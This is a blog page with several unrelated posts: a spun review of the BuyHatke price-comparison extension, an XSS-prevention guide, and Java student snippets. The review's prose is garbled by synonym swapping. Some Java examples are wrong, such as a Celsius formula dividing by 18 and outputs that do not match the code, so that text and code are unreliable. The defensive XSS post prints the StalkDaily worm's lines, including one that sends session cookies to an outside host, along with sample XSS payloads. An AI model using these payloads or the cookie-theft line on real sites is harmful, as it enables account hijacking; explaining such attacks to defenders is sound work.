Offers

Saturday 4 October 2014

Money saving tips while Shopping Online using BuyHatke

2 IIT Kharagpur students, Gaurav Dahake and Prashant Singh, in the last regard to their course in 2013 were taking a look at a couple of e-commerce websites to get an iPod for their pal's birthday. However it had not been a comfy experience. The more they surfed the more they were at a loss.

Various websites revealed various rates, price cuts and shipment time. There was no chance of quickly deciding. Lastly, they bought one, just to find out later on that the item would take five days to show up, well after the birthday. They likewise understood that when they positioned the order, they were not knowledgeable about another website which provided the item Rs 300 less. The experience set the two thinking on the requirement turn digital shopping into a problem-free experience.

Explains Dahake, "It's challenging to discover the very best offer while going shopping online. We felt every purchaser ought to have the ability to understand all the e-commerce websites that provided the item and the costs they provided."
Shopping website Buyhatke has actually re-launched a cool chrome extension that assists you discover the least expensive rates for products that you are wanting to get. The extension offers you costs from over 45 Indian e-commerce websites.
buy-hatke-extension
After you set up the extension to your Chrome browser, it stays up until you get to an item page on a shopping website. When you end up on an item page, it provides you a button to compare rates of the item throughout internet sites.If you do not wish to leave the page, you can click the extension on the leading right of the page and a list of costs appear. It likewise immediately compares costs and informs you if the item is being sold at a lower price somewhere else.
Chrome extensions for price contrast is a cool idea that has actually ended up being style just recently. This conserves users the problem of clicking through to a website to compare costs and boosts your possibilities of uncovering a much better price on a product.
buy-hatke-price-comparison
We discovered the extension rather helpful and stylish. Nevertheless, it often gets puzzled in between items. For instance, when we were on Flipkart trying to find a Seagate 1 TB disk drive, it recommended that the exact same item is readily available for less costly on the website. On closer appearance, it ended up that the less expensive price was for a 500 GB drive by the exact same producer.It might be a great idea to thoroughly filter information from websites like eBay that likewise offer pre-owned products. 
There are lots of shopping services that have actually turned up in India as e-commerce gets. For e-commerce business, discount coupons and online shopping websites reduce expense of obtaining a client. Nevertheless, it likewise puts prices pressure on products. As seeing in comScore's most current report on India, online shopping is among the fastest growing internet classifications in the nation.
So overall I think it's a must have extension if you are really into the online shopping addiction, this would help you in saving tons of money even I faced a huge loss after purchasing SSD from Flipkart as its was available for approximately Rs.800 less on SnapDeal, so make sure you compare prices online before actually purchasing anything.
Posted by at No comments:
Labels:

Steps on how to prevent XSS attacks

XSS attacks are really common and a lot of the biggest sites have had or have issues with XSS - the involved sites include Gmail, PayPal, Facebook, Hotmail and lately Twitter. Being a lead developer of a popular site I'll share some of my experience on how to fix and prevent these malicious exploits. I'll also share a little insight on Twitter's latest exploit.
This isn't an introduction to cross site scripting (XSS) and if you don't know what XSS is then please read the XSS Wikipedia page.
We'll start off by looking at last weekend's Twitter StalkDaily worm which got spread to thousands of users and was built on a XSS exploit. After this is covered, I'll share my experience on how to prevent XSS from happening in your code no matter if you code in Java, Python or PHP.

Inspection of Twitter's StalkDaily worm

The source code of the worm can be found on gist.github.com/93782.
Overview of how StalkDaily attack works:
  • the attacker had found a hole in HTML escaping of a user's profile URL - this is the basis of the attack
  • the XSS hole enables the attacker to load his own script when you visit an infected user's profile
  • when you visit an infected user's profile the attacker's script is run and following things are done to your account:
    1) the script grabs your session cookie and sends it off to a remote site via an  tag added to the document
    2) the script updates your profile URL so you also become an infected user
    3) and the script updates your status to give StalkDaily promotion
The central part of the XSS exploit is this one line - without this line the worm would not be possible:
var xss = 
urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz...."></script><a ');
In the above code the cracker escapes Twitter's protection to injects his own script - basically, XSS in a nutshell!
Do also note how the cracker sends off the session cookie along with the user's username (this is very common for XSS attacks, i.e. to steal your users data, especially login data):
c = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + c + "&username=" + usr + "'>");
How could Twitter have prevented this attack? By properly escaping user[url] so it wasn't possible to inject arbitrary HTML. We'll explore options for protection later.

Why it's hard to prevent XSS attacks

XSS attack are hard to prevent because it only takes one mistake to make your site vulnerable. And good XSS crackers are not stupid and they will try anything to spot a hole!
If you are running an application and you haven't thought much about XSS then it's VERY likely that you are vulnerable. I would urge you to test and fix your XSS holes.
On Plurk I ran a XSS hacking challenge and so far we have had 6 XSS issues reported and 1 CSRF issue. Even thought we had thought about XSS issues from the start and had a simple way of dealing with them.

Common XSS attacks

You should remember one thing: there are lots of ways to do XSS exploits! On ha.ckers.org/xss.htmlthere's a big list of common attacks. Here are some of these, to give you an idea of how creative they are:
';alert(String.fromCharCode(88,83,83))//\';
alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";
alert(String.fromCharCode(88,83,83))//--></SCRIPT>">
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC="jav ascript:alert('XSS');">

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Generally, do note that there are lots of ways to exploit and these will eventually be tried by crackers!

How to prevent XSS attacks

There's one central rule of preventing XSS which you should follow:
  • don't trust any input coming from the user
Also play on the defensive, it's better to be more restrictive than to be more open, i.e. better to be safe than sorry!

Escaping special characters

Let me show you a simple XSS exploit, say I am having a login form and in this form I am remembering a username (very common if the user did not type the correct password):
<input type="text" name="username" value="${ user_name }" />
If you use the above code, then it's very simple to do a XSS exploit by using following username:
"><script>alert("hello"></script><input
How do you prevent this? A simple way is to escape special characters, i.e.:
<input type="text" name="username" value="${ escape_special(user_name) }" />
escape_special function should escape or remove following characters:
  • < and > because they are used to introduce a tag and end a tag
  • & because it's used to introduce a character entity
  • " because it's used to escape the input value
You should do this with any input where the user is not expected to add HTML!
Here is a simple implementation of escape_special that can be found in Python's cgi module:
def escape(s, quote=None):
    '''Replace special characters "&", "<" and ">" to HTML-safe sequences.
    If the optional flag quote is true, the quotation mark character (")
    is also translated.'''
    s = s.replace("&", "&") # Must be done first!
    s = s.replace("<", "<")
    s = s.replace(">", ">")
    if quote:
        s = s.replace('"', """)
    return s
I am sure other languages have a very similar escape function.

If you want to enable HTML or CSS...

If you do want the user to add HTML then you should be very, very careful. For example, want to enable the user to add arbitrary CSS to your site, then be sure that you escape stuff like this (which is a XSS exploit that works in Internet Explorer):
a {
   background:url("javascript:alert('XSS')");
}
Generally, if you enable HTML, then be sure that you control which subset of HTML that's enabled (by for example stripping illegal HTML tags).
Do not let the user add JavaScript unless you can control what is possible.

JavaScript and innerHTML

Two of the XSS issues on Plurk involved innerHTML, so you should also be super careful about these.
Generally, here is one of our fixes to prevent XSS via innerHTML (basically we remove < and >):
$('nick_name_span').innerHTML = input.value.replace(/[<>]/g, '');

Conclusion

XSS issues can be very malicious and I hope this blog post has given you some more insight of how modern XSS attacks work and how to prevent them.
If you have any questions, warstories or suggestions, don't hesitate to post a comment.
Posted by at No comments:
Labels:

Wednesday 17 September 2014

Creating Object

Assume I have 2 classes one(Cse412lab2) contains the main method and the other (StackOfmethod) contains different other methods

Creating object of StackOfmethod class

StackOfmethod ob1=new StackOfmethod();

 Overloading Methods


public void method(){
        System.out.println("Nothing to print");
    }
 
    public void method(String name){
        System.out.println("Hello " +name);
     
    }

  Constructor

public StackOfmethod(String name, String Age){
        System.out.println("Hello "+name);
        System.out.println("Your Age " + Age );
             
}

*** class name StackOfmethod

 

Access private variable


    private int x=10;
    private int y=15;
    public void accessPrivateVariable(){
        int res=0;
     
        res =x+y;
        System.out.println(res);
    }

** variable out side any method are called instance variable
Posted by at No comments:
Labels:

Netbeans Desktop application Example

Link of the Project

http://www.mediafire.com/?jw4qu2ml9ssfqgz

Basic GUI Java

Net-beans project code

http://www.mediafire.com/?uzg36zadm316ef2

Download Jdk and jre

http://www.oracle.com/technetwork/java/javase/downloads/index.html

Download Net-beans

http://netbeans.org/downloads/

Java networking

Java networking code for netbeans

http://www.mediafire.com/?dqpcxi6r100gir6

First run Host.java
then run Guest.java
Posted by at No comments:
Labels:

Java Database Connection

Please find the following link of netbeans project for java database connection

http://www.mediafire.com/?a4sjp2paayk2bax

Please note that u have to create a database first using xampp with the name "cse412lab"
Then import the cse412lab.sql (available in the rar file) file while you are inside the database "cse412lab"

Now if you run the program using netbeans your program is likely to run without any error.
Posted by at No comments:
Labels:

Ideone.com | Online Java Compiler & Debugging Tool 

Ideone.com | Online Java Compiler & Debugging Tool


OBJECT ORIENTED ANALYSIS & DESIGN

Posted by at No comments:
Labels:
http://www.mediafire.com/?jr60x9rqyqtstaj
http://www.mediafire.com/?3mlc9c859wn72c9
http://www.mediafire.com/?yq0vmuf06dkwjw9
http://www.mediafire.com/view/?pafr9tc04a98qt0
http://www.mediafire.com/view/?bp47vxnrl8h4jqe
http://www.mediafire.com/?ajx1nlqk22i6tgb
http://www.mediafire.com/view/?mars072cgqped1z
http://www.mediafire.com/?7wn83uz29m1ikv3


Tomcat software:
http://www.mediafire.com/?l1sobjh13cm35zs
Posted by at No comments:
Labels:

Java

Posted by at No comments:
Labels:

Program

import java.lang.Math;
class b4
{
    public static void main (String[] args) {
        double a=56.34;
        double y=Math.sin(a);
        System.out.printf("The sin value of %f is %f",a,y);
}
}
 Output
The sin value of 56.340000 is -0.207157

 

Program

class it{
    public static void main (String[] args) {
        int i,j;
for(i=1;i<=5;i++)
{

for(j=1;j<=i;j++)
System.out.printf("% d\t",i);
System.out.printf("\n");
}      
}
}

Output

2 2 
3 3 3
4 4 4 4 
5 5 5 5 5 

Fibonaci

class fibonaci{
    public static void main (String[] args) {
int n,m=100,x,y;
n=0; x=1;
System.out.printf("%d\t",x);

while(x<=m)
{
y=n+x;
System.out.printf("% d\t",y);
n=x; x=y;
}
}
}
Output
1 1 2 3  5 8.........

Fahrenheit to Celsius

import java.util.Scanner;
class f
{
    public static void main (String[] args) {
        Scanner input = new Scanner(System.in);
        float  F;
        float  C;
        System.out.println("Enter a number");
        F = input.nextInt();
        C=(F-32)/18;
        System.out.printf("Converted Celsius Heat is %.2f",C);
}
}

Output
Enter a number
420
Converted Celsius Heat is 21.56

Program


import java.lang.Math;
class b1
{
    public static void main (String[] args) {
        double a=56.34;
        double y=Math.sqrt(a);
        System.out.printf("The Square Root of %f is %f",a,y);
}

Output 
The Square Root of 56.340000 is 7.505998
Posted by at No comments:
Labels:
Subscribe to: Posts (Atom)